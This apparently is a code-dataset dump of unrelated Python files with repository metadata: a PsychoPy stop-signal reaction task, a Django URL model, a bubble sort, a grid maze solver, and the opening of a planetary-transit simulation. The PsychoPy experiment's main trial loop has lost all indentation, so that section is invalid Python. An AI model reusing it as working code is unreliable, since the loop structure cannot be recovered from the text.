os.makedirs(_thisDir + os.sep +'logfiles/')
# Measure the monitors refresh rate
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] is None:
    # getActualFrameRate() returns None when the rate cannot be measured
    # (e.g. some drivers/VMs); fall back to a nominal 60 Hz so the
    # division below cannot raise a TypeError.
    expInfo['frameRate'] = 60.0
frame_dur=1000/expInfo['frameRate'] #"frame_dur" = the duration of a single frame (ms)
#print out useful info on frame rate for the interested user
print('Monitor frame rate is %s' %(expInfo['frameRate']))
# Staircase state: current stop time plus its step size and floor/ceiling.
stoptime=taskInfo['StopS start pos. (seconds)']
stepsize = taskInfo_brief['Step size (s)']
upper_ssd = taskInfo_brief['Highest SSD (s)']
lower_ssd = taskInfo_brief['Lowest SSD (s)']
#Use experiment handler with 2 loops, a practice loop and a main trial loop
Output_ExpH = _thisDir + os.sep + u'data/s_%s_%s_%s' % (expInfo['Participant ID'],
    expName, expInfo['date'])
thisExp = data.ExperimentHandler(
    name = 'OSARI', version = '1.73',
    extraInfo = taskInfo_brief, #this will save all of the user input for task info brief - might want also the full task info
    savePickle=True, saveWideText=True,
    dataFileName = Output_ExpH, autoLog = True)
# save a log file for detail verbose info
logFile = logging.LogFile(Output_ExpH+'.log', level=logging.DEBUG)
logging.console.setLevel(logging.WARNING)  # this outputs to the screen, not a file
#Input files that are used to create the trial list at the start of each block
# Each row is one trial; Signal column: 0 = Go, 1 = Stop (see module docstring).
conditions = data.importConditions('TestConditions.csv') #conditions file for the 'main trials'
practiceGoConditions = data.importConditions('practiceGoConditions.csv') #conditions file for the 'practice go trials'
practiceMixedConditions = data.importConditions('practiceMixedConditions.csv') #conditions file for the 'practice go and stop trials'
if taskInfo_brief['Practice trials']:
    prac_block_n=2 # number of practice blocks hard coded assuming we will always have 1 go block and 1 mixed block
    n_blocks = taskInfo_brief['Number of Test Blocks']+prac_block_n
else:
    prac_block_n=0
    n_blocks = taskInfo_brief['Number of Test Blocks']
#An "outerLoop" that corresponds to blocks, we use this loop to repeat sets of trials however many times we want
outerLoop = data.TrialHandler(trialList=[], nReps=n_blocks, name = 'Block')#note: nReps also includes our 2 practice blocks
#We start out experiment with the outerLoop
thisExp.addLoop(outerLoop)
# --------------------------------------------------------------
# Keyboard parameters
# This section specifies the details of how we will check for
# key presses and key lifts.
# Note:
#Known issues with using iohub on Mac with security settings
#Bypass method noted on discourse page at:
#https://discourse.psychopy.org/t/tracking-key-release/1099
#
# --------------------------------------------------------------
# Low-level pyglet key-state handler attached to the window.
# NOTE(review): this rebinds the name `keyboard` (previously the
# psychopy.hardware.keyboard module); `kb` was created earlier, so the
# module is no longer needed under that name, but the shadowing is fragile.
key=pyglet.window.key
keyboard = key.KeyStateHandler()
win.winHandle.push_handlers(keyboard)
# --------------------------------------------------------------
# Stimulus parameters
#
# --------------------------------------------------------------
# ----------------- Instructions--------------------------------
# --------------------------------------------------------------
#practice trial text
# All instruction/feedback TextStims are created once here and drawn on demand.
understand=visual.TextStim(win, pos=[0, 0], height=1, color= [1,1,1],
    text="Do you understand the task? (Y/N)", units='cm' )
practice_go_inst=visual.TextStim(win, pos=[0, 0], height=1, color= [1,1,1],
    text="Lets start with some Go trials.\n Press any button to begin!", units='cm' )
practice_stop_inst=visual.TextStim(win, pos=[0, 0], height=1, color= [1,1,1],
    text="Great! Next, lets do some Go and Stop trials!\n Press any button to begin!", units='cm' )
# Instructions
instr_image=visual.ImageStim(win, image='Stimuli'+os.sep+'instr_image.png', units='cm')
instr_image_SS=visual.ImageStim(win, image='Stimuli'+os.sep+'instr_image_SS.png', units='cm')
Main_instructions = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
    text="To begin a trial, press and hold the space key\n\nOn 'Go trials': release the space key at the target\n\nOn 'Stop trials': keep the space key pressed\n\n[press any key to continue]", units="cm")
# Spaceship variant replaces the default instructions entirely.
if taskInfo_brief['Spaceship']:
    Main_instructions = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
        text="Help the alien land his ship!\n\nPress and hold the space key untill the yellow on the UFO line reaches the target \n\nIf the UFO stops rising keep holding the space key!\n\n[press any key to continue]", units='cm')
practice_prepare = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
    text="First lets practice!", units='cm')
PressKey_instructions = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
    text="Press and hold the space key when you are ready!", units='cm')
# Feedback messages are offset left (x = -8 cm) so they sit beside the bar.
TooSoon_text = visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
    text="Oops! You lifted too soon!\nPress space to restart countdown" , units='cm')
incorrectstop = visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
    text="Oops! You held the \nbutton for too long" , units='cm')
incorrectgo = visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
    text="Oops! That was a Stop trial \nYou did not withold your response" , units='cm')
correctstop=visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
    text="Correct!\nYou withheld your response" , units='cm')
wrongKey=visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
    text="WrongKey - Please press the space key", units='cm' )
# Clock driving the 3-2-1 countdown, and the digit drawn at the target line.
countdown_clock=core.Clock()
number_text = visual.TextStim(win, pos=[0, Target_pos],height=1, color=[-1,-1,-1], text="1", units='cm')
# -------------------- Countdown--------------------------------
# --------------------------------------------------------------
# A function to count down the start of the trial and warn if key is lifted too soon
def countdown():
    """Run the 3-2-1 pre-trial countdown while the participant holds the key.

    Redraws the bar, target arrows and (optionally) the spaceship every frame,
    overlaying the remaining count at the target line. If the held key is
    released during the countdown, a "too soon" message is shown and the
    countdown restarts once a key is pressed again; escape quits the task.

    Uses module-level globals: countdown_clock, kb, win, Bar, fillBar,
    Spaceship, targetArrowRight, targetArrowLeft, number_text, TooSoon_text,
    taskInfo_brief. (Fix: removed the unused `keydown` bookkeeping variable
    and a stray debug print.)
    """
    countdown_clock.reset()
    while int(countdown_clock.getTime())<4:
        # clear=False keeps the key events so the trial loop can still see the hold.
        remainingKeys = kb.getKeys(keyList=['space', 'escape'], waitRelease=False, clear=False)
        # Counts 3, 2, 1 as whole seconds elapse ("0" is computed but never drawn).
        number_text.text="%s"%(3-int(countdown_clock.getTime()))
        if remainingKeys:# if a key was pressed <------------------------make this specific to space once integrates
            for key in remainingKeys:
                if key.duration:  # a duration means the key has been released
                    kb.clearEvents () #clear the key events
                    kb.clock.reset() #reset the keyboard clock
                    TooSoon_text.draw() #tell the participant they lifted their finger too soon (during the countdown)
                    win.flip() # draw the "too soon" message
                    k = event.waitKeys() # wait for the key to be pressed again
                    if k[0]=='escape':#make sure the user can still quit in this loop
                        print('User pressed escape, quiting now')
                        win.close()
                        core.quit()
                    countdown_clock.reset() # reset the countdown clock
        # Redraw the static scene plus the countdown digit each frame.
        Bar.draw()
        fillBar.draw()
        if taskInfo_brief['Spaceship']:
            Spaceship.draw()
        targetArrowRight.draw()
        targetArrowLeft.draw()
        if int(countdown_clock.getTime())<3:
            number_text.draw()
        win.flip()
# ----------------- Filling bar---------------------------------
# --------------------------------------------------------------
# Specify the filling and static bar
bar_width_vert1=0-(taskInfo['Bar width (cm)']/2)
bar_width_vert2=(taskInfo['Bar width (cm)']/2)
# "vert" = vertices (corners) of filling bar in x y coordinates ([0, 0] = centre)
# (starts as a 0.01 cm sliver at the bar's base; the trial loop raises the top edge)
vert = [(bar_width_vert1,0-taskInfo['Bar base below fixation (cm)']), (bar_width_vert1,0-taskInfo['Bar base below fixation (cm)']+.01),
        (bar_width_vert2,0-taskInfo['Bar base below fixation (cm)']+.01), (bar_width_vert2,0-taskInfo['Bar base below fixation (cm)'])]
# NOTE(review): this is an alias, not a copy — original_vert and vert are the
# same list object. It only works because the trial loop restores vert in
# place each frame; confirm before relying on original_vert as a snapshot.
original_vert=vert
fillBar= visual.ShapeStim(win, fillColor='skyblue', lineWidth=0, opacity=1, units='cm', vertices=vert)
# ------------------ Static bar---------------------------------
# --------------------------------------------------------------
# "fullvert" = vertices of the static background bar
fullvert = [(bar_width_vert1,0-taskInfo['Bar base below fixation (cm)']),
            (bar_width_vert1,taskInfo['Bar top above fixation (cm)']),
            (bar_width_vert2,taskInfo['Bar top above fixation (cm)']),
            (bar_width_vert2,0-taskInfo['Bar base below fixation (cm)'])]
Bar = visual.ShapeStim(win, vertices=fullvert, fillColor='white', lineWidth=0, opacity=1, units='cm')
# ------------------ Target line--------------------------------
# --------------------------------------------------------------
# Specify the target width
target_width = 0.5
# Vertices of the target arrows (equilateral triangles either side of the bar)
targetArrowRightvert = [(1.5,Target_pos),
    (1.5+target_width,Target_pos+(target_width/np.sqrt(3))),(1.5+target_width,Target_pos-(target_width/np.sqrt(3)))]
targetArrowRight = visual.ShapeStim(win, vertices=targetArrowRightvert, fillColor='yellow', lineWidth=0, opacity=1, units='cm')
targetArrowLeftvert = [(-1.5-target_width,Target_pos+(target_width/np.sqrt(3))),(-1.5-target_width,Target_pos-(target_width/np.sqrt(3))),
    (-1.5,Target_pos)]
targetArrowLeft = visual.ShapeStim(win, vertices=targetArrowLeftvert, fillColor='yellow', lineWidth=0, opacity=1, units='cm')
# ---------------------- Spaceship (optional) ------------------
# --------------------------------------------------------------
# Specify the spaceship object for if people want to use a spaceship
#How high is the spaceship in cm (set the position to be the
Spaceship_height_cm=2
#set it so that the line in the middle of the spaceship should eventually line up with the targetline
Spaceship=visual.ImageStim(win, image='Stimuli'+os.sep+'SpaceShip_scaled.png', pos=(0, vert[2][1]), units='cm')
Spaceship_practice_im=visual.ImageStim(win, image='Stimuli'+os.sep+'Practice_Image.png', pos=(10, 0), units='cm')
# --------------------------------------------------------------
# Initialize trials
#
# --------------------------------------------------------------
# --------------------------------------------------------------
#Trial loop
# Per-session state used by the trial loop below.
inc=0
height = 0          # current filled height of the bar (cm)
correct=[]          # outcome code of the previous trial (drives the staircase)
#keep track of feedback to give individual feedback at the end
feedback_list=[]
correct_gos=0       # tally of correct Go responses (main trials only)
correct_StopSs=0    # tally of correct Stop responses
count=0
#"block_count" keeps track of how many blocks there have been
block_count=0
#"trial_count" keeps track of how many trials there have been
trial_count=0
practice=True
# ------------------- clocks ----------------------------------
# --------------------------------------------------------------
#draw instructions
Main_instructions.draw()
if taskInfo_brief['Spaceship']:
    instr_image_SS.draw()
else:
    instr_image.draw()
win.flip()
core.wait(1)
#wait for button press
event.waitKeys()
#give warning practice
if taskInfo_brief['Practice trials']:
    practice_prepare.draw()
    win.flip()
    event.waitKeys()
# Inter-stimulus interval between trials (seconds).
ISI = 2
# --------------------------------------------------------------
# --------------------------------------------------------------
# START TRIALS
# --------------------------------------------------------------
# --------------------------------------------------------------
block_count=0 #blocks
for block in outerLoop:
print(block)
if block_count == 0 and taskInfo_brief['Practice trials']:
trials = data.TrialHandler(trialList = practiceGoConditions, nReps = 1, method = taskInfo_brief['Trial order'], name = 'practiceGoTrials',autoLog = True)
elif block_count ==1 and taskInfo_brief['Practice trials']:
trials = data.TrialHandler(trialList = practiceMixedConditions, nReps = 1, method = taskInfo_brief['Trial order'], name = 'practiceMixedTrials', autoLog = True)
else:
trials = trials = data.TrialHandler(trialList = conditions, nReps = 1, method = taskInfo_brief['Trial order'], name = 'testBlocks', autoLog = True)
#Note 1: nReps is the number of repetitions of the condition rows set in the 'practiceGoTrials', 'practiceMixedTrials' or 'TestConditions' file.
#Users can control the number of trials by increasing the number of rows per condition in the conditions file OR ...
#by changing the number of nReps. For example, if your conditions file has two rows (0 and 1), and your nReps is 3, you will have 6 trials
#We recommend users change the number of trials using the conditions file rather than nReps
#Note 2: method = 'random' randomly selects the conditions in the conditions files, you can also use 'sequential'
thisExp.addLoop(trials)
if block_count>2 and taskInfo_brief['Practice trials']:
#set message
Blocks_completed = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
text="Block %s of %s complete!!\n\nPress space when ready to continue!"%(block_count-prac_block_n, n_blocks-prac_block_n), units='cm')
Blocks_completed.draw()
win.flip()
core.wait(1)
#wait for keypress
event.waitKeys()
elif not taskInfo_brief['Practice trials'] and block_count>0:
#set message
Blocks_completed = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
text="Block %s of %s complete!!\n\nPress space when ready to continue!"%(block_count-prac_block_n, n_blocks-prac_block_n), units='cm')
Blocks_completed.draw()
win.flip()
core.wait(1)
#wait for keypress
event.waitKeys()
#note what block we are on
block_count=block_count+1
# ------------------- trial loop ------------------------------
# --------------------------------------------------------------
# On each iteration of the trial loop we will:
# 1. Check if this is the first block -> if it is did user request practice trials?
# -> if yes present go practice trials and stop practice trials (label as
# practice in output (i.e. "trial_label") --> check if they understood the task --> if yes continue
# 2. Set the position of the SSD based on if they were correct or not on previous trial
# 3. participant pushes key and we start the trial
# 4. trial complete compile feedback and save data
#iterate through the set of trials we have been given for this block
trial_count=0
for thisTrial in trials:
trial_count=trial_count+1 #count trials
#Reset the colour of the target arrows
targetArrowRight.fillColor='yellow'
targetArrowLeft.fillColor='yellow'
# ----------------------------------------------------------------------
# ------------------- 1. trial loop Check if the user asked for practice
#------------------------trials and if this is the first block
# ----------------------------------------------------------------------
if trial_count==1:
if trials.name == 'practiceGoTrials':
#draw practice "Go" trial instruction
practice_go_inst.draw()
trial_label='practice'
win.flip()
#wait for key press
event.waitKeys()
elif trials.name == 'practiceMixedTrials':
#draw practice "Stop" trial instruction
practice_stop_inst.draw()
trial_label='practice'
win.flip()
#wait for key press
core.wait(3)
event.waitKeys()
if trials.name == 'testBlocks' and ((taskInfo_brief['Practice trials'] and block_count==3) or (taskInfo_brief['Practice trials']==False and block_count==1)):
#If this is the first main trial (i.e. the trial count is 1 more than the practice trials)
#ask the participant if they understand the task.
understand.draw()
#Reset the stop time so it doesn't carry over from the practice
stoptime=taskInfo['StopS start pos. (seconds)']
#Reset correct as well so that the loop to change stoptimes is not entered
correct=[]
win.flip()
#wait for key press
UnderstandKey = event.waitKeys(keyList=['y','n'])
#check if the user understood the task, if not ('n') quit the task
if UnderstandKey[0] == 'n':
core.quit()
practice=False
trial_label='main'
trial_count=1
#reset the stop pos to be what it should be at the start
this_stoptime=trial_length
#print('this_stoptime:',this_stoptime)
trial_label=trials.name
# ---------------------------------------------------------------
# ------------------- 2. set position of SSD based on if previous
#------------------------response was correct
# ---------------------------------------------------------------
#Find out if/where the rising bar should stop on this trial based on accuracy in previous
if not taskInfo_brief['Method']=='fixed':
if correct==-1 and round(stoptime,3) > round(lower_ssd,3):#if they incorrectly lifted on a StopS trial (checking success count allows us to check if the trial restarted)
stoptime=stoptime-stepsize
elif correct == -1 and round(stoptime,3) == round(lower_ssd,3):
stoptime = lower_ssd
elif correct ==2 and round(stoptime,3) < round(upper_ssd,3):#if they correctly stopped on the StopS trial
stoptime=stoptime+stepsize
elif correct == 2 and round(stoptime,3) == round(upper_ssd,3):# never equal floats in python. so we use round.
stoptime = upper_ssd
elif taskInfo_brief['Method']=='fixed':
stoptime=thisTrial['fixedStopTime']
print(stoptime)
#reset correct
correct=[]
#set the stop time based on if this is a 'Go' or 'Stop' trial
#if Signal = 0, then trial type = Go,
#if Signal = 1, then trial type = Stop
#if this is a go trial, the stop time is the maximum trial time (i.e. time taken to fill bar)
Signal =thisTrial['Signal']
if Signal==0:
this_stoptime=trial_length
else:
this_stoptime = stoptime #stop time is the trial length - the time taken to travel from the target to the top - the current step size)
#print('this_stoptime:', this_stoptime)
# ---------------------------------------------------------------
# ------------------- 3. Participant pushes key
#---------------------- Start of trial
# ---------------------------------------------------------------
#draw instructions to hold key down
PressKey_instructions.draw()
win.flip()
#wait for keypress
kb.start() # we need to start watching the keyboard before a key is pressed
kb.clearEvents ()
k = event.waitKeys()
#check for if user wishes to esc
if k[0]=='escape':
print('User pressed escape, quiting now')
win.close()
core.quit()
#reset the vertices to their begining position
fillBar.vertices = original_vert#vert
if taskInfo_brief['Spaceship']:
Spaceship.pos=(0, original_vert[2][1])
#Count down before trial starts
if taskInfo_brief['Count down']:
countdown()
targetArrowRight.setAutoDraw(True)
targetArrowLeft.setAutoDraw(True)
Bar.setAutoDraw(True)
fillBar.setAutoDraw(True)
# Set autoDraw for the stimulus elements before trial starts
# (Note: draw order is defined by the order in which setAutoDraw is called)
if taskInfo_brief['Spaceship']:
Spaceship.setAutoDraw(True)
#Record the frame intervals for the interested user
win.frameIntervals=[]
win.recordFrameIntervals = True
#"waiting" = variable to say if we are waiting for the key to be lifted
waiting=1
height=0
#print('current vert:', vert[1][1])
time_elapsed=0#we want this to be 0 at this point
win.callOnFlip(kb.clock.reset)
win.flip()
#kb.clock.reset()
while time_elapsed<trial_length and waiting==1:#whilst we are waiting for the button to be lifted
# Watch the keyboard for a response
remainingKeys = kb.getKeys(keyList=['space', 'escape'], waitRelease=False, clear=False)
# How much time has elapsed since the start of the trial
time_elapsed=kb.clock.getTime()
# Calculate "height" - the current height of the bar in cm
# this will be added to the vertices position to adjust the size of
# the filling (blue) bar.
if time_elapsed<this_stoptime:
height = (time_elapsed*bar_height)/trial_length
elif time_elapsed>=this_stoptime:
height = (this_stoptime*bar_height)/trial_length#max_height
# If a key has been pressed (i.e. there is something in the keyboard events)
# we will draw the filling bar. This will stop if key lift detected.
if remainingKeys:
for key in remainingKeys:
if key.duration:
lift_time = kb.clock.getTime()
kd=key.duration
krt=key.rt
kd_start_synced=key.duration-np.abs((key.tDown-kb.clock.getLastResetTime()))#<----can just do key.duration - key.rt
#print('lift time:', lift_time, 'duration:', kd, 'duration_startsynced', kd_start_synced)
kb.clearEvents() #clear the key events
#say we are not waiting anymore and break the loop
waiting=0
#Set the vertices of the filling bar
vert[1]=(vert[1][0], vert[1][1]+height)#left corner
vert[2]=(vert[2][0], vert[2][1]+height)#right corner
# Optional print for debuggins (prints the coordinates of the top two vertices)
#print('y vertices top left:', vert[1][1])
#print('y vertices top right:', vert[2][1])
fillBar.vertices = vert
if taskInfo_brief['Spaceship']:
Spaceship.pos=(0, vert[2][1])
lastvert=vert[2]
# Reset vertices to original position
vert[1]=(vert[1][0], vert[1][1]-height)# left corner
vert[2]=(vert[2][0], vert[2][1]-height)# right corner
win.flip()
#stop recording frame intervals
win.recordFrameIntervals = False
#if this was a stop trial then the above while loop will have broken when the stoplimit was
#reached. but, we still want to wait untill the end of the trial to make sure they
#actually hold and don't lift as soon as the stop limit is reached
# ---------------------------------------------------------------
# ------------------- 4. trial complete
#---------------------- compile feedback and save data
# ---------------------------------------------------------------
kb.stop() # stop watching the keyboard
#if the bar has filled but we are still waiting for the key to lift
if waiting==1:
kd_start_synced='NaN'
# Optional prints for debugging
#print('trial length:',trial_length)
lifted=0#<-------------------------------------------Are the variables lifted
RT='NaN'
#if this was a go trial feedback that the participant incorrectly stopped
if Signal==0:
feedback=incorrectstop
# Change the colour of the target arrows
targetArrowRight.fillColor='Red'
targetArrowLeft.fillColor='Red'
correct=-2
# If this was a stop trial feedback that the participant correctly stopped
elif Signal==1:# The participant must have continued holding untill the end of the total trial length
correct=2
#change the colour of the target Arrows
targetArrowRight.fillColor='Green'
targetArrowLeft.fillColor='Green'
feedback=correctstop
correct_StopSs=correct_StopSs+1
# If the key was lifted before the bar filled
else:
# If this was a stop trial feedback that the participant incorrectly stopped
lifted=1
RT = lift_time
if Signal==0:# Give feedback they correctly lifted and time in ms from target
correct=1
feedback_synced = round(abs(((trial_length*.8)-lift_time)*1000)) #this used the kb.clock.getTime we used previously and saw was binned
targetArrowRight.fillColor='Green'
targetArrowLeft.fillColor='Green'
correctgo = visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
text="You stopped the bar \n %.0f ms from the target!"%(feedback_synced), units='cm') # <--------------------------- the ".8" is hard coded here - do we want it flexible this is the proportion of the trial time where the target is
feedback_list.append(feedback_synced)
if trial_label=="main":# Only add to the feedback if this is a main trial (i.e. dont count the practice trials)
correct_gos=correct_gos+1
feedback=correctgo
elif Signal==1:# Give feedback they incorrectly lifted -- and this is an unsuccessfull trial, so the trial should restart (it will be noted in the output that the trial restarted)
feedback=incorrectgo
targetArrowRight.fillColor='Red'
targetArrowLeft.fillColor='Red'
correct=-1
if taskInfo_brief['Trial by trial feedback']:
feedback.setAutoDraw(True)
win.flip()
if Signal == 0:
this_stoptime = 'NaN'
with open(Output+'.txt', 'a') as b:
b.write('%s %s %s %s %s %s %s\n'%(block_count, trial_label, trial_count, Signal, lifted, this_stoptime, kd_start_synced))
trials.addData('block', block_count)
trials.addData('trialType', trial_label)
trials.addData('trial', trial_count)
trials.addData('signal', Signal)
trials.addData('response', lifted)
trials.addData('ssd', this_stoptime)
trials.addData('rt', kd_start_synced)
thisExp.nextEntry()
core.wait(ISI)
# Reset visual stimuli for next trial
feedback.setAutoDraw(False)
targetArrowRight.setAutoDraw(False)
targetArrowLeft.setAutoDraw(False)
fillBar.setAutoDraw(False)
Bar.setAutoDraw(False)
if taskInfo_brief['Spaceship']:
Spaceship.setAutoDraw(False)
count=count+1# Only add to the trial could if we have been successfull
# Write a nice thank-you message and some feedback on performance
EndMessage = visual.TextStim(win, pos=[0, 0.4], height=.1, color=[1,1,1],
    text="The End!\nThanks for taking part!\n[press a key to end]")
# Alternative end text with performance summary, kept for reference:
#text="The End!\n\nAverage time from target: %.3f\n\nCorrect Go: %s out of %s\n\nCorrect Stop: %s out of %s"%(
#    np.average(feedback_list), correct_gos, taskInfo_brief['n_go_trials (per block)']*taskInfo_brief['n blocks'], correct_StopSs, taskInfo_brief['n_stop_trials (per block)']*taskInfo_brief['n blocks']))
# --------------------------------------------------------------
# --------------------------------------------------------------
# END TRIALS
# --------------------------------------------------------------
# --------------------------------------------------------------
#play fun video
mov = visual.MovieStim3(win, 'Stimuli/Astronaught_floss_test.mp4', size=(320, 240),
    flipVert=False, flipHoriz=False, loop=False)
# Play the reward movie with the end message overlaid; any key press skips it.
while mov.status != visual.FINISHED:
    mov.draw()
    EndMessage.draw()
    win.flip()
    if event.getKeys():
        break
# Be nice and thank participant.
EndMessage.draw()
win.flip()
# Wait for button press
event.waitKeys()
core.quit()
|
[
"[email protected]"
] | |
a4ddd7673db772a7ff5ee0d63826c0d2cdc7cfa0
|
0e43b0550dce2a7d7ea3ffdcc1749dcee7dbdeac
|
/src/shortner/models.py
|
9fee1ec9941b3146c9c86f3ebbd909e7ea40b7f8
|
[] |
no_license
|
Ayukha/Trydjango
|
b9434395cf15438a112d471ab27ea02923791c4e
|
2fc164e86f96f23da3a2fc7987350ef7426c2f0d
|
refs/heads/master
| 2021-01-10T00:03:55.668319 | 2017-05-06T21:04:13 | 2017-05-06T21:04:13 | 90,490,885 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 225 |
py
|
from django.db import models
# Create your models here.
class kirrURL(models.Model):
    """A single stored URL.

    BUG fix: Django's field class is ``CharField`` (capital C);
    ``models.charField`` raises AttributeError as soon as the module is
    imported, so this model could never load.
    """
    # max_length is required for CharField; 220 chars matches the original intent.
    url = models.CharField(max_length=220,)

    def __str__(self):
        # Shown in the admin / shell on Python 3.
        return str(self.url)

    def __unicode__(self):
        # Python 2 counterpart of __str__ (harmless on Python 3).
        return str(self.url)
|
[
"[email protected]"
] | |
e82b39a461cefaaa07efebc35f4363d5803dc091
|
58eb959374c21feb80032705b593c8949913b9cd
|
/level3.py
|
301bafdbacd47c9c8d5929fa551ae72536fcb923
|
[] |
no_license
|
Legu/humanoid-hunt
|
7a9a027d68b92d17651b2e7f7f11a5259a9f601a
|
7d34f6f35a81287f501a0c5709d2015cbd7b6a85
|
refs/heads/master
| 2023-02-25T06:40:26.876483 | 2021-02-04T21:15:08 | 2021-02-04T21:15:08 | 336,081,952 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,067 |
py
|
from collections import defaultdict
import sys
sys.setrecursionlimit(1000000) # One MILLION coz why not
def solve(challenge):
    """Parse the hunt description and return the move string from S to F.

    Each input line is ``"x,y"`` optionally followed by a space and a
    comma-separated move list (U/D/L/R).  The markers 'S', 'F' and 'X'
    terminate a move list and stamp the current cell as start, finish or
    dead; every other cell the path walks through is stamped 'N'.
    """
    # Missing cells read back as '' thanks to the nested str-defaultdict,
    # which solve_maze treats as a wall.
    grid = defaultdict(lambda: defaultdict(str))
    for record in challenge.split('\n'):
        if ' ' in record:
            coord, steps = record.split(' ')
        else:
            coord, steps = record, ''
        x, y = (int(part) for part in coord.split(','))
        grid[x][y] = 'N'
        for step in steps.split(','):
            if step in ('X', 'S', 'F'):
                if step == 'S':
                    start = (x, y)
                grid[x][y] = step
                break
            if step == 'U':
                y -= 1
            elif step == 'D':
                y += 1
            elif step == 'L':
                x -= 1
            elif step == 'R':
                x += 1
            grid[x][y] = 'N'
    # Depth-first search from the start cell recorded above.
    return solve_maze(grid, start[0], start[1], '')
def solve_maze(maze, x, y, moves):
    """Depth-first search from (x, y); return the move string that reaches
    a cell marked 'F', or None if no route exists from here.

    ``maze`` is a nested defaultdict(str): unknown cells read as '' and
    count as walls, 'X' is a dead cell and 'V' marks already-visited.
    """
    cell = maze[x][y]  # note: reading a missing cell inserts '' (harmless)
    if cell in ('', 'X', 'V'):
        return None
    if cell == 'F':
        return moves
    # Mark visited before recursing so cycles terminate.
    maze[x][y] = 'V'
    for dx, dy, label in ((0, -1, 'U'), (0, 1, 'D'), (-1, 0, 'L'), (1, 0, 'R')):
        path = solve_maze(maze, x + dx, y + dy, moves + label)
        if path is not None:
            return path
    return None
|
[
"[email protected]"
] | |
e012673eb791002e37d6b08fb1782d403fc2a68b
|
1750af039bfd4324c12e581608ba4a3a902828cf
|
/bubble-sort.py
|
02ea889717850d8cf8f38e0de757eb9cc3ba35dd
|
[] |
no_license
|
Kevin-Kip/sorting-algorithms
|
1c0145fc3e3e63576e7440ebf756ab4e045e86d3
|
96b36f936c1263b5399ec77e291691afc0599e08
|
refs/heads/master
| 2020-03-26T03:30:12.145606 | 2018-08-12T10:56:46 | 2018-08-12T10:56:46 | 144,459,129 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 751 |
py
|
def bubble_sort(list_to_sort):
    """Sort ``list_to_sort`` in place with bubble sort and return it.

    Repeatedly walks the list swapping adjacent out-of-order items; each
    pass bubbles the largest remaining item to the end, so the scanned
    range shrinks by one per pass.  Worst case O(n^2); the early-exit
    flag below makes already-sorted input O(n).
    """
    n = len(list_to_sort)
    # the -1 is for array indexing since indices start at 0
    for i in range(n - 1):
        swapped = False  # did this pass change anything?
        # -i excludes the tail that is already in its final position
        for j in range(n - 1 - i):
            # swap if the current item is greater than the next one
            if list_to_sort[j] > list_to_sort[j + 1]:
                list_to_sort[j], list_to_sort[j + 1] = list_to_sort[j + 1], list_to_sort[j]
                swapped = True
        if not swapped:
            # No swaps in a full pass: the list is sorted, stop early.
            break
    return list_to_sort
if __name__ == "__main__":
    # Demo run: sort a small sample list and print the result.
    # Replace the print with your own list
    print(bubble_sort([5, 7, 3, 2, 1, 9, 0]))
|
[
"[email protected]"
] | |
19c3c70ea2d90226ad9cab7a86daaa37d89a199e
|
d0e79ff646811aad496df8e9537fef18b2f32d22
|
/kepler.py
|
edd3c51a4741ef1c84bf24444a0c3c9ad8ddfdd1
|
[] |
no_license
|
Kai-FengChen/ASIAA_Hackday
|
57bcad63b9edea2db7c11f812a726289bf0bfdf0
|
98e8e597f8a3c6e4594dc3615ececf0eb9ed95e1
|
refs/heads/master
| 2021-01-10T16:44:27.142706 | 2015-11-23T07:38:49 | 2015-11-23T07:38:49 | 46,537,567 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,022 |
py
|
from visual.controls import *
import ruler
from pylab import *
import scipy.interpolate
from visual import *
from visual.controls import *
from visual.graph import *
def get_func_for_luminosity(r_planet, r_star, scaling_factor):
    """Build an interpolator mapping planet-star centre distance to
    relative luminosity during a transit.

    The star's disc is rasterised on a grid (one cell = ``scaling_factor``
    length units).  Only one quadrant is rasterised; the symmetric totals
    are doubled/quadrupled below.  For each horizontal planet position the
    occulted cells are zeroed and the remaining flux fraction recorded.

    Returns a ``scipy.interpolate.interp1d`` callable valid for distances
    in ``[0, (2*r_star - 1) * scaling_factor]``.
    """
    r_planet = int(r_planet / scaling_factor)
    r_star = int(r_star / scaling_factor)
    # Occupancy mask of one quadrant of the stellar disc.
    full_area = zeros((r_star, r_star))
    for x in range(r_star):
        for y in range(r_star):
            if x ** 2 + y ** 2 < r_star ** 2:
                full_area[x, y] = 1
    r_planet_square = r_planet ** 2
    sum_full_area_q = sum(full_area)  # cells in the unobstructed quadrant
    # BUG fix: wrap range() in list() -- range objects have no .insert()
    # on Python 3, so the original (Python-2 era) code crashed there.
    d_list = list(range(r_planet, r_star * 2))
    l_list = []
    for x_planet in d_list:
        area = copy(full_area)
        # Only the columns the planet can overlap need re-testing.
        x1 = max(0, x_planet - r_planet)
        x2 = min(r_star - 1, x_planet + r_planet)
        for x in range(x1, x2):
            for y in range(0, r_planet):
                if (x - x_planet) ** 2 + y ** 2 < r_planet_square:
                    area[x, y] = 0.
        # Visible flux fraction: (occulted quadrant + mirror quadrant +
        # the two untouched half-disc quadrants) over the full disc.
        luminosity = (sum(area) * 2 + sum_full_area_q * 2) / (sum_full_area_q * 4)
        l_list.append(luminosity)
    # Extend the curve flat down to distance 0 so interpolation never
    # falls off the left edge.
    d_list.insert(0, 0)
    l_list.insert(0, l_list[0])
    d_list = array(d_list) * scaling_factor
    return scipy.interpolate.interp1d(d_list, l_list)
# Transit lookup: ll(d) = relative stellar flux when the planet centre is a
# distance d (in metres) from the star centre.
ll=get_func_for_luminosity(r_planet=1e10,r_star=4e10,scaling_factor=1e8)
# The star ("giant") and planet ("dwarf") as VPython spheres.
giant = sphere()
giant.material = materials.emissive
giant.pos = vector(-1e11,0,0)
